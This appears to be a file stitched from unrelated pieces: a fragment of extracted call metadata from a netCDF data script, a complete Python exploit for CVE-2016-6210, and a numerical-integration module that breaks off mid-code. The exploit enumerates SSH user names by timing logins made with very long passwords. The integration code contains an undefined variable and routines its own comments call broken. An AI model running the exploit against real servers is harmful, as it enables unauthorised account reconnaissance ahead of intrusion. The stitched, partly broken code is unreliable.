'"""depth"""'], {'new_name': '"""depth"""', 'i_use': 'i_depths'}), "(netcdf, 'depth', new_name='depth', i_use=i_depths)\n", (5615, 5666), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((5674, 5738), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""lon"""'], {'new_name': '"""lon"""', 'i_use': 'i_lons'}), "(netcdf, 'lon', new_name='lon', i_use=i_lons)\n", (5693, 5738), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((5746, 5810), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""lat"""'], {'new_name': '"""lat"""', 'i_use': 'i_lats'}), "(netcdf, 'lat', new_name='lat', i_use=i_lats)\n", (5765, 5810), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((5928, 5960), 'modeldata.ModelData', 'ModelData', (['time', 'depth', 'lat', 'lon'], {}), '(time, depth, lat, lon)\n', (5937, 5960), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((6968, 6997), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['input_dir'], {}), '(input_dir)\n', (6986, 6997), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((7011, 7042), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfiles[0])'], {}), '(input_dir + ncfiles[0])\n', (7018, 7042), False, 'from netCDF4 import Dataset\n'), ((7053, 7123), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""depth"""'], {'new_name': '"""depth"""', 'i_use': 'i_depths'}), "(netcdf, 'depth', new_name='depth', i_use=i_depths)\n", (7072, 7123), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((7131, 7195), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""lon"""'], {'new_name': '"""lon"""', 'i_use': 'i_lons'}), "(netcdf, 'lon', 
new_name='lon', i_use=i_lons)\n", (7150, 7195), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((7203, 7267), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', '"""lat"""'], {'new_name': '"""lat"""', 'i_use': 'i_lats'}), "(netcdf, 'lat', new_name='lat', i_use=i_lats)\n", (7222, 7267), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((7386, 7402), 'numpy.arange', 'np.arange', (['(1)', '(13)'], {}), '(1, 13)\n', (7395, 7402), True, 'import numpy as np\n'), ((711, 738), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfile)'], {}), '(input_dir + ncfile)\n', (718, 738), False, 'from netCDF4 import Dataset\n'), ((989, 1057), 'log.info', 'log.info', (['log_file', 'f"""Appending time data from {input_dir + ncfile}"""'], {}), "(log_file, f'Appending time data from {input_dir + ncfile}')\n", (997, 1057), False, 'import log\n'), ((1197, 1252), 'log.info', 'log.info', (['log_file', 'f"""Adding absolute current velocity"""'], {}), "(log_file, f'Adding absolute current velocity')\n", (1205, 1252), False, 'import log\n'), ((1766, 1828), 'log.info', 'log.info', (['log_file', 'f"""Loading data {main_input_dir + nc_file}"""'], {}), "(log_file, f'Loading data {main_input_dir + nc_file}')\n", (1774, 1828), False, 'import log\n'), ((1846, 1887), 'modeldata.from_local_file', 'from_local_file', (['(main_input_dir + nc_file)'], {}), '(main_input_dir + nc_file)\n', (1861, 1887), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((2826, 2886), 'log.info', 'log.info', (['log_file', 'f"""Saving merged netcdf to {output_path}"""'], {}), "(log_file, f'Saving merged netcdf to {output_path}')\n", (2834, 2886), False, 'import log\n'), ((3382, 3406), 'os.path.splitext', 'os.path.splitext', (['ncfile'], {}), '(ncfile)\n', (3398, 3406), False, 'import os\n'), ((3433, 3488), 'datetime.datetime.strptime', 'datetime.strptime', (['ncfile_datestr', 'input_filenameformat'], {}), '(ncfile_datestr, input_filenameformat)\n', (3450, 3488), False, 'from datetime import datetime\n'), ((3586, 3613), 'os.path.exists', 'os.path.exists', (['output_path'], {}), '(output_path)\n', (3600, 3613), False, 'import os\n'), ((3723, 3827), 'log.info', 'log.info', (['log_file', 'f"""Getting monthly means for {ncfile_datetime.month} {ncfile_datetime.year}"""'], {}), "(log_file,\n f'Getting monthly means for {ncfile_datetime.month} {ncfile_datetime.year}'\n )\n", (3731, 3827), False, 'import log\n'), ((3839, 3895), 'datetime.datetime', 'datetime', (['ncfile_datetime.year', 'ncfile_datetime.month', '(1)'], {}), '(ncfile_datetime.year, ncfile_datetime.month, 1)\n', (3847, 3895), False, 'from datetime import datetime\n'), ((4316, 4387), 'log.info', 'log.info', (['log_file', 'f"""Loading data from {input_dir + ncfiles_merge[0]}"""'], {}), "(log_file, f'Loading data from {input_dir + ncfiles_merge[0]}')\n", (4324, 4387), False, 'import log\n'), ((4405, 4450), 'modeldata.from_local_file', 'from_local_file', (['(input_dir + ncfiles_merge[0])'], {}), '(input_dir + ncfiles_merge[0])\n', (4420, 4450), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((4957, 5004), 'log.info', 'log.info', (['log_file', 'f"""Getting time mean values"""'], {}), "(log_file, f'Getting time mean values')\n", (4965, 5004), False, 'import log\n'), ((5131, 5178), 'log.info', 'log.info', (['log_file', 'f"""Writing to {output_path}"""'], {}), "(log_file, 
f'Writing to {output_path}')\n", (5139, 5178), False, 'import log\n'), ((5543, 5558), 'numpy.array', 'np.array', (['[0.0]'], {}), '([0.0])\n', (5551, 5558), True, 'import numpy as np\n'), ((6526, 6561), 'numpy.nanmean', 'np.nanmean', (['quantity.values'], {'axis': '(0)'}), '(quantity.values, axis=0)\n', (6536, 6561), True, 'import numpy as np\n'), ((7411, 7471), 'log.info', 'log.info', (['log_file', 'f"""Getting total mean for month: {month}"""'], {}), "(log_file, f'Getting total mean for month: {month}')\n", (7419, 7471), False, 'import log\n'), ((7741, 7773), 'modeldata.ModelData', 'ModelData', (['time', 'depth', 'lat', 'lon'], {}), '(time, depth, lat, lon)\n', (7750, 7773), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((8670, 8723), 'log.info', 'log.info', (['log_file', 'f"""Writing to file: {output_path}"""'], {}), "(log_file, f'Writing to file: {output_path}')\n", (8678, 8723), False, 'import log\n'), ((797, 876), 'log.info', 'log.info', (['log_file', 'f"""Appending {variable_name} data from {input_dir + ncfile}"""'], {}), "(log_file, f'Appending {variable_name} data from {input_dir + ncfile}')\n", (805, 876), False, 'import log\n'), ((1341, 1393), 'log.info', 'log.info', (['log_file', 'f"""Adding absolute wind velocity"""'], {}), "(log_file, f'Adding absolute wind velocity')\n", (1349, 1393), False, 'import log\n'), ((1999, 2072), 'utilities.get_ncfiles_in_time_range', 'get_ncfiles_in_time_range', (['input_dir', 'date0', 'date0'], {'timeformat': 'timeformat'}), '(input_dir, date0, date0, timeformat=timeformat)\n', (2024, 2072), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((2303, 2338), 'netCDF4.Dataset', 'Dataset', (['(input_dir + nc_file_add[0])'], {}), '(input_dir + nc_file_add[0])\n', (2310, 2338), False, 'from netCDF4 import Dataset\n'), ((3627, 3694), 'log.info', 'log.info', (['log_file', 'f"""File already exists, skipping: {output_path}"""'], {}), "(log_file, f'File already exists, skipping: {output_path}')\n", (3635, 3694), False, 'import log\n'), ((3956, 4016), 'datetime.datetime', 'datetime', (['ncfile_datetime.year', '(ncfile_datetime.month + 1)', '(1)'], {}), '(ncfile_datetime.year, ncfile_datetime.month + 1, 1)\n', (3964, 4016), False, 'from datetime import datetime\n'), ((4041, 4116), 'utilities.get_ncfiles_in_time_range', 'get_ncfiles_in_time_range', (['input_dir', 'start_date', 'end_date'], {'including_end': '(0)'}), '(input_dir, start_date, end_date, including_end=0)\n', (4066, 4116), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((4151, 4208), 'datetime.datetime', 'datetime', (['ncfile_datetime.year', 'ncfile_datetime.month', '(31)'], {}), '(ncfile_datetime.year, ncfile_datetime.month, 31)\n', (4159, 4208), False, 'from datetime import datetime\n'), ((4235, 4310), 'utilities.get_ncfiles_in_time_range', 'get_ncfiles_in_time_range', (['input_dir', 'start_date', 'end_date'], {'including_end': '(1)'}), '(input_dir, start_date, end_date, including_end=1)\n', (4260, 4310), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((4516, 4553), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfiles_merge[i])'], {}), '(input_dir + ncfiles_merge[i])\n', (4523, 4553), False, 'from netCDF4 import Dataset\n'), ((6055, 6082), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfile)'], {}), '(input_dir + ncfile)\n', (6062, 6082), False, 'from netCDF4 import Dataset\n'), ((8572, 8607), 'numpy.nanmean', 
'np.nanmean', (['quantity.values'], {'axis': '(0)'}), '(quantity.values, axis=0)\n', (8582, 8607), True, 'import numpy as np\n'), ((2508, 2572), 'log.info', 'log.info', (['log_file', 'f"""Adding variable {variable_name} to netcdf"""'], {}), "(log_file, f'Adding variable {variable_name} to netcdf')\n", (2516, 2572), False, 'import log\n'), ((2599, 2640), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable_name'], {}), '(netcdf, variable_name)\n', (2617, 2640), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((4700, 4773), 'log.info', 'log.info', (['log_file', 'f"""Appending data from {input_dir + ncfiles_merge[i]}"""'], {}), "(log_file, f'Appending data from {input_dir + ncfiles_merge[i]}')\n", (4708, 4773), False, 'import log\n'), ((6131, 6205), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable'], {'new_name': 'variable', 'i_depths': 'i_depths'}), '(netcdf, variable, new_name=variable, i_depths=i_depths)\n', (6149, 6205), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((6253, 6327), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable'], {'new_name': 'variable', 'i_depths': 'i_depths'}), '(netcdf, variable, new_name=variable, i_depths=i_depths)\n', (6271, 6327), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((6359, 6422), 'numpy.concatenate', 'np.concatenate', (['(quantity.values, next_quantity.values)'], {'axis': '(0)'}), '((quantity.values, next_quantity.values), axis=0)\n', (6373, 6422), True, 'import numpy as np\n'), ((7894, 7918), 'os.path.splitext', 'os.path.splitext', (['ncfile'], {}), '(ncfile)\n', (7910, 7918), False, 'import os\n'), ((8033, 8060), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfile)'], {}), '(input_dir + ncfile)\n', (8040, 8060), False, 'from netCDF4 import Dataset\n'), ((7938, 7988), 'datetime.datetime.strptime', 'datetime.strptime', (['ncfile_datestr', 'filename_format'], {}), '(ncfile_datestr, filename_format)\n', (7955, 7988), False, 'from datetime import datetime\n'), ((8125, 8199), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable'], {'new_name': 'variable', 'i_depths': 'i_depths'}), '(netcdf, variable, new_name=variable, i_depths=i_depths)\n', (8143, 8199), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((8263, 8337), 'modeldata.netcdf_to_quantity', 'netcdf_to_quantity', (['netcdf', 'variable'], {'new_name': 'variable', 'i_depths': 'i_depths'}), '(netcdf, variable, new_name=variable, i_depths=i_depths)\n', (8281, 8337), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((8377, 8440), 'numpy.concatenate', 'np.concatenate', (['(quantity.values, next_quantity.values)'], {'axis': '(0)'}), '((quantity.values, next_quantity.values), axis=0)\n', (8391, 8440), True, 'import numpy as np\n'), ((7646, 7670), 'datetime.datetime', 'datetime', (['(1900)', 'month', '(1)'], {}), '(1900, month, 1)\n', (7654, 7670), False, 'from datetime import datetime\n'), ((7669, 7689), 'datetime.datetime', 'datetime', (['(1900)', '(1)', '(1)'], {}), '(1900, 1, 1)\n', (7677, 7689), False, 'from datetime import datetime\n'), ((7521, 7545), 'datetime.datetime', 'datetime', (['(1900)', 'month', '(1)'], {}), '(1900, month, 1)\n', (7529, 7545), False, 'from datetime import datetime\n')]
|
#!/usr/bin/python
#
# CVEs: CVE-2016-6210 (Credits for this go to <NAME>)
#
# Author: 0_o -- null_null
# nu11.nu11 [at] yahoo.com
# Oh, and it is n-u-one-one.n-u-one-one, no l's...
# Wonder how the guys at packet storm could get this wrong :(
#
# Date: 2016-07-19
#
# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210.
#
# Prerequisites: Network access to the SSH daemon.
#
# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not
# permitted to may put you in big trouble!
#
# And now - the fun part :-)
#
import paramiko
import time
import numpy
import argparse
import sys
args = None
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get_args():
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
parser.add_argument("host", type = str, help = "Give SSH server address like ip:port or just by ip")
group.add_argument("-u", "--user", type = str, help = "Give a single user name")
group.add_argument("-U", "--userlist", type = str, help = "Give a file containing a list of users")
parser.add_argument("-e", "--enumerated", action = "store_true", help = "Only show enumerated users")
parser.add_argument("-s", "--silent", action = "store_true", help = "Like -e, but just the user names will be written to stdout (no banner, no anything)")
parser.add_argument("--bytes", default = 50000, type = int, help = "Send so many BYTES to the SSH daemon as a password")
parser.add_argument("--samples", default = 12, type = int, help = "Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users")
parser.add_argument("--factor", default = 3.0, type = float, help = "Used to compute the upper timing boundary for user enumeration")
parser.add_argument("--trials", default = 1, type = int, help = "try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary")
args = parser.parse_args()
return args
def get_banner(host, port):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = '<PASSWORD>')
except:
banner = ssh.get_transport().remote_version
ssh.close()
return banner
def connect(host, port, user):
global args
starttime = 0.0
endtime = 0.0
p = 'B' * int(args.bytes)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
starttime=time.clock()
try:
ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)
except:
endtime=time.clock()
finally:
ssh.close()
return endtime - starttime
def main():
global args
args = get_args()
if not args.silent: print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210")
if not args.silent: print("Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by <NAME>\n\n")
if args.host:
host = args.host.split(":")[0]
try:
port = int(args.host.split(":")[1])
except IndexError:
port = 2222
users = []
if args.user:
users.append(args.user)
elif args.userlist:
with open(args.userlist, "r") as f:
users = f.readlines()
else:
if not args.silent: print(bcolors.FAIL + "[!] " + bcolors.ENDC + "You must give a user or a list of users")
sys.exit()
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing SSHD at: " + bcolors.BOLD + str(host) + ":" + str(port) + bcolors.ENDC + ", Banner: " + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)
# get baseline timing for non-existing users...
baseline_samples = []
baseline_mean = 0.0
baseline_deviation = 0.0
if not args.silent: sys.stdout.write(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Getting baseline timing for authenticating non-existing users")
for i in range(1, int(args.samples) + 1):
if not args.silent: sys.stdout.write('.')
if not args.silent: sys.stdout.flush()
sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))
baseline_samples.append(sample)
if not args.silent: sys.stdout.write('\n')
# remove the biggest and smallest value
baseline_samples.sort()
baseline_samples.pop()
baseline_samples.reverse()
baseline_samples.pop()
# do math
baseline_mean = numpy.mean(numpy.array(baseline_samples))
baseline_deviation = numpy.std(numpy.array(baseline_samples))
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline mean for host " + host + " is " + str(baseline_mean) + " seconds.")
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Baseline variation for host " + host + " is " + str(baseline_deviation) + " seconds.")
upper = baseline_mean + float(args.factor) * baseline_deviation
if not args.silent: print(bcolors.WARNING + "[*] " + bcolors.ENDC + "Defining timing of x < " + str(upper) + " as non-existing user.")
if not args.silent: print(bcolors.OKBLUE + "[*] " + bcolors.ENDC + "Testing your users...")
#
# Get timing for the given user name...
#
for u in users:
user = u.strip()
enum_samples = []
enum_mean = 0.0
for t in range(0, int(args.trials)):
timeval = connect(host, port, user)
enum_samples.append(timeval)
enum_mean = numpy.mean(numpy.array(enum_samples))
if (enum_mean < upper):
if not (args.enumerated or args.silent) :
print(bcolors.FAIL + "[-] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
else:
if not args.silent:
print(bcolors.OKGREEN + "[+] " + bcolors.ENDC + user + " - timing: " + str(enum_mean))
else:
print(user)
if __name__ == "__main__":
main()
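# Hedged usage note (hypothetical script name and target host):
#   python cve-2016-6210_user_enum.py 192.0.2.10:22 -U users.txt --samples 12 --factor 3.0 --trials 3
# Affected daemons hash the oversized password only for existing accounts, so an
# existing user's auth time exceeds the baseline mean + factor * standard deviation.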
|
[
"sys.stdout.write",
"paramiko.SSHClient",
"argparse.ArgumentParser",
"time.clock",
"numpy.array",
"sys.stdout.flush",
"paramiko.AutoAddPolicy",
"sys.exit"
] |
[((1074, 1099), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (1097, 1099), False, 'import argparse\n'), ((2395, 2415), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (2413, 2415), False, 'import paramiko\n'), ((2814, 2834), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (2832, 2834), False, 'import paramiko\n'), ((2909, 2921), 'time.clock', 'time.clock', ([], {}), '()\n', (2919, 2921), False, 'import time\n'), ((2451, 2475), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (2473, 2475), False, 'import paramiko\n'), ((2870, 2894), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (2892, 2894), False, 'import paramiko\n'), ((4301, 4427), 'sys.stdout.write', 'sys.stdout.write', (["(bcolors.OKBLUE + '[*] ' + bcolors.ENDC +\n 'Getting baseline timing for authenticating non-existing users')"], {}), "(bcolors.OKBLUE + '[*] ' + bcolors.ENDC +\n 'Getting baseline timing for authenticating non-existing users')\n", (4317, 4427), False, 'import sys\n'), ((4687, 4709), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (4703, 4709), False, 'import sys\n'), ((4905, 4934), 'numpy.array', 'numpy.array', (['baseline_samples'], {}), '(baseline_samples)\n', (4916, 4934), False, 'import numpy\n'), ((4970, 4999), 'numpy.array', 'numpy.array', (['baseline_samples'], {}), '(baseline_samples)\n', (4981, 4999), False, 'import numpy\n'), ((3153, 3165), 'time.clock', 'time.clock', ([], {}), '()\n', (3163, 3165), False, 'import time\n'), ((3918, 3928), 'sys.exit', 'sys.exit', ([], {}), '()\n', (3926, 3928), False, 'import sys\n'), ((4494, 4515), 'sys.stdout.write', 'sys.stdout.write', (['"""."""'], {}), "('.')\n", (4510, 4515), False, 'import sys\n'), ((4541, 4559), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (4557, 4559), False, 'import sys\n'), ((5895, 5920), 'numpy.array', 'numpy.array', (['enum_samples'], {}), '(enum_samples)\n', (5906, 5920), False, 'import numpy\n')]
|
import Rate_calculation
#import constants as ct
from mpmath import mp
from mpmath import fp
import numpy as np
import scipy.integrate as spint
import time
methods=["mp-gl", "mp-ts", "fp-gl", "fp-ts", "sp-quad", "sp-gauss", "monte-carlo", "w-cumsum", "sp-simps", "romberg"];
#relative error tolerance for the iterative simps refinement (w-cumsum method)
err_rel=1e-1;
def_nodes=1e2; #default number of nodes
maxloop=100;
# general integration method
# syntax is mpmath-like; set the limits you don't want to integrate over to 0
#
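# Example (hypothetical integrand): integrate a 2-D Gaussian over [0,1]x[0,1]
# with the mpmath Gauss-Legendre backend; the unused z-limit is passed as 0:
#   integrate(lambda x, y: mp.exp(-(x**2 + y**2)), [0, 1], [0, 1], 0, "mp-gl")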
def integrate(f, limx, limy, limz, method):
if method=="mp-gl":
if limz!=0:
return mp.quad(f, limx, limy, limz, method="gauss-legendre");
else:
if limy!=0:
return mp.quad(f, limx, limy, method="gauss-legendre");
else:
return mp.quad(f, limx, method="gauss-legendre");
elif method=="mp-ts":
if limz!=0:
return mp.quad(f, limx, limy, limz, method="tanh-sinh");
else:
if limy!=0:
return mp.quad(f, limx, limy, method="tanh-sinh");
else:
return mp.quad(f, limx, method="tanh-sinh");
elif method=="fp-gl":
if limz!=0:
return fp.quad(f, limx, limy, limz, method="gauss-legendre");
else:
if limy!=0:
return fp.quad(f, limx, limy, method="gauss-legendre");
else:
return fp.quad(f, limx, method="gauss-legendre");
elif method=="fp-ts":
if limz!=0:
return fp.quad(f, limx, limy, limz, method="tanh-sinh");
else:
if limy!=0:
return fp.quad(f, limx, limy, method="tanh-sinh");
else:
return fp.quad(f, limx, method="tanh-sinh");
elif method=="sp-quad":
if limz!=0:
return spint.tplquad(f, limz[0], limz[1], limy[0], limy[1], limx[0], limx[1])[0];
else:
if limy!=0:
return spint.dblquad(f, limy[0], limy[1], limx[0], limx[1])[0];
else:
return spint.quad(f, limx[0], limx[1])[0];
elif method=="romberg":
if not np.ndim(limx)==0:
limx=[float(limx[0]), float(limx[1])];
if not np.ndim(limy)==0:
limy=[float(limy[0]), float(limy[1])];
if not np.ndim(limz)==0:
limz=[float(limz[0]), float(limz[1])];
reltol=1e-16;
abstol=1e-16;
if limz!=0:
return spint.romberg(lambda z: spint.romberg(lambda y: spint.romberg(lambda x: float(f(x,y,z)), limx[0], limx[1], tol=abstol, rtol=reltol), limy[0], limy[1], tol=abstol, rtol=reltol), limz[0], limz[1], tol=abstol, rtol=reltol);
else:
if limy!=0:
                return spint.romberg(lambda y: spint.romberg(lambda x: float(f(x,y)), limx[0], limx[1], tol=abstol, rtol=reltol), limy[0], limy[1], tol=abstol, rtol=reltol);
else:
return spint.romberg(lambda x: float(f(x)), limx[0], limx[1], tol=abstol, rtol=reltol);
#currently broken, but slow so unused
elif method=="sp-gauss":
if not np.ndim(limx)==0:
limx=[float(limx[0]), float(limx[1])];
if not np.ndim(limy)==0:
limy=[float(limy[0]), float(limy[1])];
if not np.ndim(limz)==0:
limz=[float(limz[0]), float(limz[1])];
order=7;
if limz!=0:
return spint.fixed_quad(lambda z: spint.fixed_quad(lambda y: spint.fixed_quad(lambda x: f(x,y,z), limx[0], limx[1], n=order)[0], limy[0], limy[1], n=order)[0], limz[0], limz[1], n=order)[0];
else:
if limy!=0:
                return spint.fixed_quad(lambda y: spint.fixed_quad(lambda x: f(x,y), limx[0], limx[1], n=order)[0], limy[0], limy[1], n=order)[0];
else:
return spint.fixed_quad(lambda x: f(x), limx[0], limx[1], n=order)[0];
elif method=="w-cumsum":
if not np.ndim(limx)==0:
limx=[float(limx[0]), float(limx[1])];
if not np.ndim(limy)==0:
limy=[float(limy[0]), float(limy[1])];
if not np.ndim(limz)==0:
limz=[float(limz[0]), float(limz[1])];
if limz!=0:
dx=(limx[1]-limx[0])/def_nodes;
dy=(limy[1]-limy[0])/def_nodes;
dz=(limz[1]-limz[0])/def_nodes;
loop=0;
lastres=0;
while True:
xl=np.arange(limx[0], limx[1], dx);
yl=np.arange(limy[0], limy[1], dy);
zl=np.arange(limz[0], limz[1], dz);
X, Y, Z=np.meshgrid(xl, yl, zl);
fx=[];
for i in range(0, len(X)):
fy=[];
for j in range(0, len(Y)):
fz=[];
for k in range(0, len(Z)):
fz.append(f(X[i][j][k], Y[i][j][k], zl[k]));
fy.append(spint.simps(fz, dx=dz));
fx.append(spint.simps(fy, dx=dy));
res=spint.simps(fx, dx=dx);
if loop!=0:
if np.abs(res-lastres)/res < err_rel:
return res;
else:
ad=(1/2)**loop; #linear to begin with
dx=dx*ad;
dy=dy*ad;
dz=dz*ad;
lastres=res;
if loop > maxloop:
break;
loop+=1;
else:
if limy!=0:
dx=def_dx;
dy=def_dx;
loop=0;
lastres=0;
while True:
xl=np.arange(limx[0], limx[1], dx);
yl=np.arange(limy[0], limy[1], dy);
X, Y=np.meshgrid(xl, yl);
fx=[];
for i in range(0, len(X)):
fy=[];
for j in range(0, len(Y)):
fy.append(f(X[i][j], yl[j]));
fx.append(spint.simps(fy, dx=dy));
res=spint.simps(fx, dx=dx);
if loop!=0:
if np.abs(res-lastres)/res < err_rel:
return res;
else:
ad=(1/2)**loop; #linear to begin with
dx=dx*ad;
dy=dy*ad;
lastres=res;
if loop > maxloop:
break;
loop+=1;
else:
dx=def_dx;
loop=0;
lastres=0;
while True:
xl=np.arange(limx[0], limx[1], dx);
fx=[];
                    for i in range(0, len(xl)):
fx.append(f(xl[i]));
res=spint.simps(fx, dx=dx);
if loop!=0:
if np.abs(res-lastres)/res < err_rel:
return res;
else:
ad=(1/2)**loop; #linear to begin with
dx=dx*ad;
lastres=res;
if loop > maxloop:
break;
loop+=1;
#still a bit broken but proved slower than mp-gl
elif method=="monte-carlo":
N=int(1e6);
if limz!=0:
N=int(round(N**(1/3)));
x=np.random.rand(N)*(limx[1]-limx[0])+limx[0];
y=np.random.rand(N)*(limy[1]-limy[0])+limy[0];
            z=np.random.rand(N)*(limz[1]-limz[0])+limz[0];
X,Y,Z=np.meshgrid(x,y,z);
fxyz=[];
for i in range(0, len(X)):
fxy=[];
for j in range(0, len(Y)):
fx=[];
for k in range(0, len(Z)):
fx.append(f(X[i][j][k], Y[i][j][k], Z[i][j][k]));
fxy.append(fx);
fxyz.append(fxy);
wmax=np.max(fxyz);
wmin=np.min(fxyz);
W=np.random.rand(N, N, N)*(wmax-wmin)+wmin;
est=0;
for i in range(0, len(fxyz)):
for j in range(0, len(fxyz[i])):
for k in range(0, len(fxyz[i][j])):
if W[i][j][k] > 0 and W[i][j][k] < fxyz[i][j][k]:
est=est+fxyz[i][j][k];
elif W[i][j][k] < 0 and W[i][j][k] > fxyz[i][j][k]:
est=est+fxyz[i][j][k];
return (est/(N**3))*(limx[1]-limx[0])*(limy[1]-limy[0])*(limz[1]-limz[0])*(wmax-wmin);
else:
if limy!=0:
N=int(round(N**(1/2)));
x=np.random.rand(N)*(limx[1]-limx[0])+limx[0];
y=np.random.rand(N)*(limy[1]-limy[0])+limy[0];
X,Y=np.meshgrid(x,y);
fxy=[];
for i in range(0, len(X)):
fx=[];
for j in range(0, len(Y)):
fx.append(f(X[i][j], Y[i][j]));
fxy.append(fx);
zmax=np.max(fxy);
zmin=np.min(fxy);
Z=np.random.rand(N, N)*(zmax-zmin)+zmin;
est=0;
for i in range(0, len(fxy)):
for j in range(0, len(fxy[i])):
if Z[i][j] > 0 and Z[i][j] < fxy[i][j]:
est=est+fxy[i][j];
elif Z[i][j] < 0 and Z[i][j] > fxy[i][j]:
est=est+fxy[i][j];
return (est/(N**2))*(limx[1]-limx[0])*(limy[1]-limy[0])*(zmax-zmin);
else:
X=np.random.rand(N)*(limx[1]-limx[0])+limx[0];
fx=[];
for i in range(0, len(X)):
fx.append(f(X[i]));
ymax=np.max(fx);
ymin=np.min(fx);
Y=np.random.rand(N)*(ymax-ymin)+ymin;
est=0;
for i in range(0, len(fx)):
if Y[i] > 0 and Y[i] < fx[i]:
est=est+fx[i];
elif Y[i] < 0 and Y[i] > fx[i]:
est=est+fx[i];
return (est/N)*(limx[1]-limx[0])*(ymax-ymin);
#preallocated, expected to be slow
elif method=="sp-simps":
if limz!=0:
dx=(limx[1]-limx[0])/def_nodes;
dy=(limy[1]-limy[0])/def_nodes;
dz=(limz[1]-limz[0])/def_nodes;
loop=0;
lastres=0;
while True:
xl=np.arange(limx[0], limx[1], dx);
yl=np.arange(limy[0], limy[1], dy);
zl=np.arange(limz[0], limz[1], dz);
X, Y, Z=np.meshgrid(xl, yl, zl);
fx=[];
for i in range(0, len(X)):
fy=[];
for j in range(0, len(Y)):
fz=[];
for k in range(0, len(Z)):
fz.append(f(X[i][j][k], Y[i][j][k], zl[k]));
fy.append(spint.simps(fz, dx=dz));
fx.append(spint.simps(fy, dx=dy));
res=spint.simps(fx, dx=dx);
if loop!=0:
if np.abs(res-lastres)/res < err_rel:
return res;
else:
ad=(1/2)**loop; #linear to begin with
dx=dx*ad;
dy=dy*ad;
dz=dz*ad;
lastres=res;
if loop > maxloop:
break;
loop+=1;
else:
if limy!=0:
dx=def_dx;
dy=def_dx;
loop=0;
lastres=0;
while True:
xl=np.arange(limx[0], limx[1], dx);
yl=np.arange(limy[0], limy[1], dy);
X, Y=np.meshgrid(xl, yl);
fx=[];
for i in range(0, len(X)):
fy=[];
for j in range(0, len(Y)):
fy.append(f(X[i][j], yl[j]));
